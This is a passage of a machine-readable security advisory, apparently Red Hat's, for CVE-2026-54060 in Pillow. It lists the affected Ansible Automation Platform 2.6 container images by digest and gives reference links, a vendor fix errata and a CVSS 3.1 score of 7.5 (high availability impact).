"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-54060"
},
{
"category": "external",
"summary": "RHBZ#2497466",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497466"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-54060",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54060"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-54060",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54060"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst",
"url": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d",
"url": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-5x94-69rx-g8h2",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-5x94-69rx-g8h2"
}
],
"release_date": "2026-07-06T18:49:23.788000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T21:39:16+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50479"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
